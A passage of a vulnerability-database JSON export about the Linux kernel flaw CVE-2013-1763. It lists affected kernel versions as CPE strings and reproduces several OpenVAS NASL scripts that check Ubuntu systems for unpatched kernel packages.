"cpe:2.3:o:linux:linux_kernel:3.0.41:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.4:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.30:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.7.6:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.34:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.18:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.16:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.2:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.35:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.7.3:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.8:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.7.1:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4:rc5:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.6:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4.11:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4.23:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.17:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.2:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4.5:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4.9:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.17:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.5.5:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4.2:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.16:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.3:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.6.4:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.3.5:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2:rc6:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.1:rc4:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.7:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.21:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.1.6:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.24:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.9:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.3:rc4:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.6.6:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.6.10:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.20:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.1:rc3:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4.4:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.25:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.1.9:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.29:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4.21:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.12:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.22:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.5.1:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.33:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2:rc2:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.3:rc3:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.29:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.10:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.3:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.26:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.5.2:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.3.8:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.1:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.5.7:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.5:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.1:rc1:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.30:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2:rc7:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.3.1:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4.3:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.3.6:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.3.2:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.7.7:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4:rc6:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.38:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.1.1:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2:rc3:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0:rc4:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.23:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.28:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.27:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4.1:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.11:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.20:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0:rc7:*:*:*:*:*:*"]}], "openvas": [{"lastseen": "2018-01-26T11:10:11", "bulletinFamily": "scanner", "cvelist": ["CVE-2013-1763"], "description": "Check for the Version of linux-lts-quantal", "modified": "2018-01-25T00:00:00", "published": "2013-03-01T00:00:00", "id": "OPENVAS:841341", "href": "http://plugins.openvas.org/nasl.php?oid=841341", "type": "openvas", "title": "Ubuntu Update for linux-lts-quantal USN-1749-1", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_ubuntu_USN_1749_1.nasl 8526 2018-01-25 06:57:37Z teissa $\n#\n# Ubuntu Update for linux-lts-quantal USN-1749-1\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2013 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\n\ntag_affected = \"linux-lts-quantal on Ubuntu 12.04 LTS\";\ntag_insight = \"Brad Spengler discovered a bounds checking error for netlink messages\n requesting SOCK_DIAG_BY_FAMILY. An unprivileged local user could exploit\n this flaw to crash the system or run programs as an administrator.\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name: \"URL\" , value: \"http://www.ubuntu.com/usn/usn-1749-1/\");\n script_id(841341);\n script_version(\"$Revision: 8526 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-01-25 07:57:37 +0100 (Thu, 25 Jan 2018) $\");\n script_tag(name:\"creation_date\", value:\"2013-03-01 11:08:12 +0530 (Fri, 01 Mar 2013)\");\n script_cve_id(\"CVE-2013-1763\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_xref(name: \"USN\", value: \"1749-1\");\n script_name(\"Ubuntu Update for linux-lts-quantal USN-1749-1\");\n\n script_tag(name: \"summary\" , value: \"Check for the Version of linux-lts-quantal\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2013 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"UBUNTU12.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"linux-image-3.5.0-25-generic\", ver:\"3.5.0-25.39~precise1\", rls:\"UBUNTU12.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-01-19T15:09:35", "bulletinFamily": "scanner", "cvelist": ["CVE-2013-1763"], "description": "Check for the Version of linux", "modified": "2018-01-19T00:00:00", "published": "2013-03-01T00:00:00", "id": "OPENVAS:841343", "href": "http://plugins.openvas.org/nasl.php?oid=841343", "type": "openvas", "title": "Ubuntu Update for linux USN-1750-1", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_ubuntu_USN_1750_1.nasl 8466 2018-01-19 06:58:30Z teissa $\n#\n# Ubuntu Update for linux USN-1750-1\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2013 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\n\ntag_affected = \"linux on Ubuntu 12.10\";\ntag_insight = \"Brad Spengler discovered a bounds checking error for netlink messages\n requesting SOCK_DIAG_BY_FAMILY. An unprivileged local user could exploit\n this flaw to crash the system or run programs as an administrator.\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name: \"URL\" , value: \"http://www.ubuntu.com/usn/usn-1750-1/\");\n script_id(841343);\n script_version(\"$Revision: 8466 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-01-19 07:58:30 +0100 (Fri, 19 Jan 2018) $\");\n script_tag(name:\"creation_date\", value:\"2013-03-01 11:08:18 +0530 (Fri, 01 Mar 2013)\");\n script_cve_id(\"CVE-2013-1763\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_xref(name: \"USN\", value: \"1750-1\");\n script_name(\"Ubuntu Update for linux USN-1750-1\");\n\n script_tag(name: \"summary\" , value: \"Check for the Version of linux\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2013 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"UBUNTU12.10\")\n{\n\n if ((res = isdpkgvuln(pkg:\"linux-image-3.5.0-25-generic\", ver:\"3.5.0-25.39\", rls:\"UBUNTU12.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-3.5.0-25-highbank\", ver:\"3.5.0-25.39\", rls:\"UBUNTU12.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-3.5.0-25-omap\", ver:\"3.5.0-25.39\", rls:\"UBUNTU12.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-3.5.0-25-powerpc-smp\", ver:\"3.5.0-25.39\", rls:\"UBUNTU12.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-3.5.0-25-powerpc64-smp\", ver:\"3.5.0-25.39\", rls:\"UBUNTU12.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-05-29T18:38:10", "bulletinFamily": "scanner", "cvelist": ["CVE-2013-1763"], "description": "The remote host is missing an update for the ", "modified": "2019-03-13T00:00:00", "published": "2013-03-01T00:00:00", "id": "OPENVAS:1361412562310841341", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310841341", "type": "openvas", "title": "Ubuntu Update for linux-lts-quantal USN-1749-1", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_ubuntu_USN_1749_1.nasl 14132 2019-03-13 09:25:59Z cfischer $\n#\n# Ubuntu Update for linux-lts-quantal USN-1749-1\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2013 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_xref(name:\"URL\", value:\"http://www.ubuntu.com/usn/usn-1749-1/\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.841341\");\n script_version(\"$Revision: 14132 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-13 10:25:59 +0100 (Wed, 13 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2013-03-01 11:08:12 +0530 (Fri, 01 Mar 2013)\");\n script_cve_id(\"CVE-2013-1763\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_xref(name:\"USN\", value:\"1749-1\");\n script_name(\"Ubuntu Update for linux-lts-quantal USN-1749-1\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'linux-lts-quantal'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2013 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\", re:\"ssh/login/release=UBUNTU12\\.04 LTS\");\n script_tag(name:\"affected\", value:\"linux-lts-quantal on Ubuntu 12.04 LTS\");\n script_tag(name:\"insight\", value:\"Brad Spengler discovered a bounds checking error for netlink messages\n requesting SOCK_DIAG_BY_FAMILY. An unprivileged local user could exploit\n this flaw to crash the system or run programs as an administrator.\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = dpkg_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"UBUNTU12.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"linux-image-3.5.0-25-generic\", ver:\"3.5.0-25.39~precise1\", rls:\"UBUNTU12.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:38:21", "bulletinFamily": "scanner", "cvelist": ["CVE-2013-1763"], "description": "The remote host is missing an update for the ", "modified": "2019-03-13T00:00:00", "published": "2013-03-01T00:00:00", "id": "OPENVAS:1361412562310841339", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310841339", "type": "openvas", "title": "Ubuntu Update for linux-ti-omap4 USN-1751-1", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_ubuntu_USN_1751_1.nasl 14132 2019-03-13 09:25:59Z cfischer $\n#\n# Ubuntu Update for linux-ti-omap4 USN-1751-1\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2013 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_xref(name:\"URL\", value:\"http://www.ubuntu.com/usn/usn-1751-1/\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.841339\");\n script_version(\"$Revision: 14132 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-13 10:25:59 +0100 (Wed, 13 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2013-03-01 11:07:55 +0530 (Fri, 01 Mar 2013)\");\n script_cve_id(\"CVE-2013-1763\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_xref(name:\"USN\", value:\"1751-1\");\n script_name(\"Ubuntu Update for linux-ti-omap4 USN-1751-1\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'linux-ti-omap4'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2013 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\", re:\"ssh/login/release=UBUNTU12\\.10\");\n script_tag(name:\"affected\", value:\"linux-ti-omap4 on Ubuntu 12.10\");\n script_tag(name:\"insight\", value:\"Mathias Krause discovered a bounds checking error for netlink messages\n requesting SOCK_DIAG_BY_FAMILY. An unprivileged local user could exploit\n this flaw to crash the system or run programs as an administrator.\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = dpkg_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"UBUNTU12.10\")\n{\n\n if ((res = isdpkgvuln(pkg:\"linux-image-3.5.0-220-omap4\", ver:\"3.5.0-220.29\", rls:\"UBUNTU12.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:38:22", "bulletinFamily": "scanner", "cvelist": ["CVE-2013-1763"], "description": "The remote host is missing an update for the ", "modified": "2019-03-13T00:00:00", "published": "2013-03-01T00:00:00", "id": "OPENVAS:1361412562310841343", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310841343", "type": "openvas", "title": "Ubuntu Update for linux USN-1750-1", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_ubuntu_USN_1750_1.nasl 14132 2019-03-13 09:25:59Z cfischer $\n#\n# Ubuntu Update for linux USN-1750-1\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2013 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_xref(name:\"URL\", value:\"http://www.ubuntu.com/usn/usn-1750-1/\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.841343\");\n script_version(\"$Revision: 14132 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-13 10:25:59 +0100 (Wed, 13 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2013-03-01 11:08:18 +0530 (Fri, 01 Mar 2013)\");\n script_cve_id(\"CVE-2013-1763\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_xref(name:\"USN\", value:\"1750-1\");\n script_name(\"Ubuntu Update for linux USN-1750-1\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'linux'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2013 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\", re:\"ssh/login/release=UBUNTU12\\.10\");\n script_tag(name:\"affected\", value:\"linux on Ubuntu 12.10\");\n script_tag(name:\"insight\", value:\"Brad Spengler discovered a bounds checking error for netlink messages\n requesting SOCK_DIAG_BY_FAMILY. An unprivileged local user could exploit\n this flaw to crash the system or run programs as an administrator.\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = dpkg_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"UBUNTU12.10\")\n{\n\n if ((res = isdpkgvuln(pkg:\"linux-image-3.5.0-25-generic\", ver:\"3.5.0-25.39\", rls:\"UBUNTU12.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-3.5.0-25-highbank\", ver:\"3.5.0-25.39\", rls:\"UBUNTU12.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-3.5.0-25-omap\", ver:\"3.5.0-25.39\", rls:\"UBUNTU12.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-3.5.0-25-powerpc-smp\", ver:\"3.5.0-25.39\", rls:\"UBUNTU12.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-3.5.0-25-powerpc64-smp\", ver:\"3.5.0-25.39\", rls:\"UBUNTU12.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2018-01-22T13:09:46", "bulletinFamily": "scanner", "cvelist": ["CVE-2013-1763"], "description": "Check for the Version of linux-ti-omap4", "modified": "2018-01-22T00:00:00", "published": "2013-03-01T00:00:00", "id": "OPENVAS:841339", "href": "http://plugins.openvas.org/nasl.php?oid=841339", "type": "openvas", "title": "Ubuntu Update for linux-ti-omap4 USN-1751-1", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_ubuntu_USN_1751_1.nasl 8483 2018-01-22 06:58:04Z teissa $\n#\n# Ubuntu Update for linux-ti-omap4 USN-1751-1\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2013 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\n\ntag_affected = \"linux-ti-omap4 on Ubuntu 12.10\";\ntag_insight = \"Mathias Krause discovered a bounds checking error for netlink messages\n requesting SOCK_DIAG_BY_FAMILY. An unprivileged local user could exploit\n this flaw to crash the system or run programs as an administrator.\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name: \"URL\" , value: \"http://www.ubuntu.com/usn/usn-1751-1/\");\n script_id(841339);\n script_version(\"$Revision: 8483 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-01-22 07:58:04 +0100 (Mon, 22 Jan 2018) $\");\n script_tag(name:\"creation_date\", value:\"2013-03-01 11:07:55 +0530 (Fri, 01 Mar 2013)\");\n script_cve_id(\"CVE-2013-1763\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_xref(name: \"USN\", value: \"1751-1\");\n script_name(\"Ubuntu Update for linux-ti-omap4 USN-1751-1\");\n\n script_tag(name: \"summary\" , value: \"Check for the Version of linux-ti-omap4\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2013 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"UBUNTU12.10\")\n{\n\n if ((res = isdpkgvuln(pkg:\"linux-image-3.5.0-220-omap4\", ver:\"3.5.0-220.29\", rls:\"UBUNTU12.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-01-19T15:09:37", "bulletinFamily": "scanner", "cvelist": ["CVE-2013-0228", "CVE-2013-0190", "CVE-2013-1763", "CVE-2013-0290"], "description": "Check for the Version of kernel", "modified": "2018-01-19T00:00:00", "published": 